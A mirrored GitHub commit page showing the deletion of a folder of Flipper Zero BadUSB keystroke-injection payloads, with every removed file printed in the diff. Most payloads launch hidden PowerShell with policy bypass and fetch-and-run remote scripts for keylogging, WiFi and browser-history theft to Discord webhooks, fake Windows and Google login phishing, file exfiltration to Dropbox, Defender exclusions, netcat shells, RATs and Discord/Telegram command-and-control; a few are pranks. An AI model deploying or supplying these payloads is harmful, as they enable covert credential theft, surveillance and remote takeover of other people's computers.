gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2026-01-01 07:26:06 -08:00
Code Issues Packages Projects Releases Wiki Activity

Delete Fast-Execution-Scripts directory

Browse Source
This commit is contained in:
egieb
2023-12-29 15:21:40 +00:00
committed by GitHub
parent 5b927b2175
commit c2549dc60e
32 changed files with 0 additions and 626 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
Fast-Execution-Scripts/Add-Defender-Exclusion.txt
View File

@@ -1,22 +0,0 @@
REM Title: Add Windows Defender Exclusion
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Add Windows Defender Exclusion for C:/ drive.
REM Target: Windows 10
REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C Add-MpPreference -ExclusionPath C:/
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 3000
ALT y

19
Fast-Execution-Scripts/Browser-History-to-Discord.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's browser history to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects browser history and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/brsr-hist.ps1 | iex
ENTER

16
Fast-Execution-Scripts/Computer-ACID-Prank.txt
View File

@@ -1,16 +0,0 @@
REM Title: beigeworm's GDI Effects Prank.
REM Author: @beigeworm
REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GDI-haunter.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Desktop Screenshare over Netcat.txt
View File

@@ -1,20 +0,0 @@
REM Title: Beigeworm's Screenshare Through Netcat
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window.
REM Target: Windows 10
REM *SETUP*
REM replace YOUR_IP_HERE with your netcat attacker IP Address.
REM Run script on target Windows system.
REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required)
REM Then in a firefox browser on the Linux box > http://localhost:8080
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Screenshare.ps1 | iex
ENTER

16
Fast-Execution-Scripts/Desktop-Shortcut-Spam.txt
View File

@@ -1,16 +0,0 @@
REM Title: beigeworm's Desktop Shortcut Spammer.
REM Author: @beigeworm
REM Description: This script creates 100 shortcuts on the users Desktop.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Lnk-Spam.ps1 | iex
ENTER

28
Fast-Execution-Scripts/Discord C2 Client.txt
View File

@@ -1,28 +0,0 @@
REM Title: beigeworm's Discord Command And Control.
REM Author: @beigeworm
REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform.
REM Target: Windows 10 and 11
REM SETUP
REM Goto https://pastebin.com and make an account..
REM Create an empty paste/file and copy the RAW url.
REM Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt
REM Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H
ENTER
DELAY 5000
STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE';
STRING irm https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Discord-Image-spam.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's Spam blank image to Discord Webhook.
REM Author: @beigeworm
REM Description: This script sends a blank image to a discord webhook 25 times.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DCimg-spam.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Discord-WiFi-Grabber.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's saved WiFi to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects saved WiFi info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/DC-WiFi-Grab.ps1 | iex
ENTER

22
Fast-Execution-Scripts/Download-Execute.txt
View File

@@ -1,22 +0,0 @@
REM Title: Download-Execute from Run Prompt
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses the Run Prompt to download a file and run it.
REM Target: Windows 10
REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.
REM some setup for dukie script.
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;
REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit
CTRL-SHIFT ENTER
DELAY 3000
ALT y

20
Fast-Execution-Scripts/Exfil-to-Dropbox.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace DDROPBOX_TOKEN with your Dropbox Token.
REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Exfil-to-Dropbox.ps1 | iex
ENTER

17
Fast-Execution-Scripts/Fake Windows 10 Logon.txt
View File

@@ -1,17 +0,0 @@
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn10-noac.ps1 | iex
ENTER

17
Fast-Execution-Scripts/Fake Windows 10 Microsoft Logon.txt
View File

@@ -1,17 +0,0 @@
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn.ps1 | iex
ENTER

17
Fast-Execution-Scripts/Fake Windows 11 Logon.txt
View File

@@ -1,17 +0,0 @@
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn11-noac.ps1 | iex
ENTER

17
Fast-Execution-Scripts/Fake Windows 11 Microsoft Logon.txt
View File

@@ -1,17 +0,0 @@
REM Title: beigeworm's Fake Windows Logon Screen to Discord Webhook.
REM Author: @beigeworm
REM Description: This script kills all egde and chrome processes, starts screensaver and opens edge in fullscreen that asks for login info and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/WinLogOn11.ps1 | iex
ENTER

20
Fast-Execution-Scripts/File-Changes-to-Discord.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's monitor file changes to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileAC-to-DC.ps1 | iex
ENTER

16
Fast-Execution-Scripts/Gif-Player.txt
View File

@@ -1,16 +0,0 @@
REM Title: beigeworm's GIF Player.
REM Author: @beigeworm
REM Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/GIF-Play.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Google-Phishing-to-Discord.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's Fake Google Phishing page to Discord Webhook.
REM Author: @beigeworm
REM Description: This script makes a Fake Google Phishing page and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Google-Phish.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Http-Fileserver.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's HTTP LAN RAT
REM Author: @beigeworm
REM Description: This script hosts a webpage on the machines ip address with powershell commands to execute.
REM ( use ipconfig to find the local ip and type http://<LOCALIP>:5000/ in a browser )
REM **MUST BE RUN AS ADMIN**
REM Discord Webhook not required - It will post the machine's local IP to discord.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FolderHost-w-PS.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

19
Fast-Execution-Scripts/Http-LAN-Rat.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's HTTP LAN RAT
REM Author: @beigeworm
REM Description: This script hosts a webpage on the machines ip address with powershell commands to execute.
REM ( use ipconfig to find the local ip and type http://<LOCALIP>:5000/ in a browser )
REM **MUST BE RUN AS ADMIN**
REM Discord Webhook not required - It will post the machine's local IP to discord.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/LAN-rat.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

20
Fast-Execution-Scripts/Keylog-to-Discord.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's Keyloggger to Discord Webhook.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Keylog-to-DC.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Local-FileServer-for-Exfiltration.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's USER folder Host.
REM Author: @beigeworm
REM Description: This script hosts the User directory to the machines ip address so another device on the network can browse and exfiltrate files at will.
REM ( use ipconfig to find the local ip and type http://<LOCALIP>:5000/ in a browser )
REM **MUST BE RUN AS ADMIN**
REM Discord Webhook not required - It will post the machine's local IP to discord.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/FileServer.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

20
Fast-Execution-Scripts/Mouse-Activity-to-Discord.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's monitor mouse activity to Discord Webhook.
REM Author: @beigeworm
REM Description: This script monitors mouse activity and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/MouseAC-to-DC.ps1 | iex
ENTER

23
Fast-Execution-Scripts/README.md
View File

@@ -1,23 +0,0 @@
# Downloadable-Fast-Execution-Scripts-For-FlipperZero
Easy to setup with tutorials for web hooks etc below...
They use this cmd > `STRING powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex`
These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!
**If you want to learn more about the code, or modify them, most of these scripts are in powershell format here**
https://github.com/beigeworm/Powershell-Tools-and-Toys
# Pre-Deployment Setup
Most of these scripts will require some setup before they will work.
Setup Instructions are within the payload files.
--------------------------------------------------------------------------------
**These Scripts Are Pulled From This Repository**
https://github.com/beigeworm/assets/tree/main/Scripts
**You Should ALWAYS Read Any Scripts BEFORE running them**

20
Fast-Execution-Scripts/Screenshot-to-Dropbox.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's Exfiltrate files to Dropbox
REM Author: @beigeworm
REM Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to a dropbox account.
REM Target: Windows 10
REM *SETUP*
REM replace DDROPBOX_TOKEN with your Dropbox Token.
REM for setup instructions visit - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Discord%20Scripts/Exfiltrate%20to%20Dropbox.ps1
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShot-to-Dropbox.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Screenshots-to-Discord.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's periodic Screenshots to discord webhook
REM Author: @beigeworm
REM Description: This script takes a screenshot of the deasktop every 5 mins and posts to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/SShots-to-DC.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Simple-Netcat-Client-(admin).txt
View File

@@ -1,20 +0,0 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

19
Fast-Execution-Scripts/Simple-Netcat-Client.txt
View File

@@ -1,19 +0,0 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/NC-Client.ps1 | iex
ENTER

19
Fast-Execution-Scripts/Sys-Info-to-Discord.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's system information to discord webhook
REM Author: @beigeworm
REM Description: This script gathers system information and posts to a discord webhook address with the results.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-DC.ps1 | iex
ENTER

20
Fast-Execution-Scripts/Sys-Info-to-Telegram.txt
View File

@@ -1,20 +0,0 @@
REM Title: beigeworm's system information to Telegram Bot
REM Author: @beigeworm
REM Description: This script gathers system information and posts to Telegram Bot Chat with the results.
REM for setup info on telegram bots see - https://github.com/beigeworm/Powershell-Tools-and-Toys/blob/main/Telegram%20and%20Dropbox%20Scripts/Simple%20Telegram%20RAT.ps1
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='BOT_TOKEN';$cid='CHAT_ID'; irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/Sys-Info-to-TG.ps1 | iex
ENTER

27
Fast-Execution-Scripts/Telegram C2 Client.txt
View File

@@ -1,27 +0,0 @@
REM Title: beigeworm's Telegram Command And Control.
REM Author: @beigeworm
REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform.
REM Target: Windows 10 and 11
REM SETUP INSTRUCTIONS
REM 1. visit https://t.me/botfather and make a bot.
REM 2. add bot api to script.
REM 3. search for bot in top left box in telegram and start a chat then type /start.
REM 5. Run Script on target System
REM 6. Check telegram chat for 'waiting to connect' message.
REM 7. this script has a feature to wait until you start the session from telegram.
REM 8. type in the computer name from that message into telegram bot chat to connect to that computer.
REM 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex
ENTER

19
Fast-Execution-Scripts/US-Keyboard.txt
View File

@@ -1,19 +0,0 @@
REM Title: beigeworm's Keyboard Language changer.
REM Author: @beigeworm
REM Description: This script changes the keyboard layout and system language to US.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/US-keyboard.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

17
Fast-Execution-Scripts/Wallpaper-Jumpscare.txt
View File

@@ -1,17 +0,0 @@
REM Title: beigeworm's Wallpaper Jump Scare.
REM Author: @beigeworm
REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/wallpaper.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y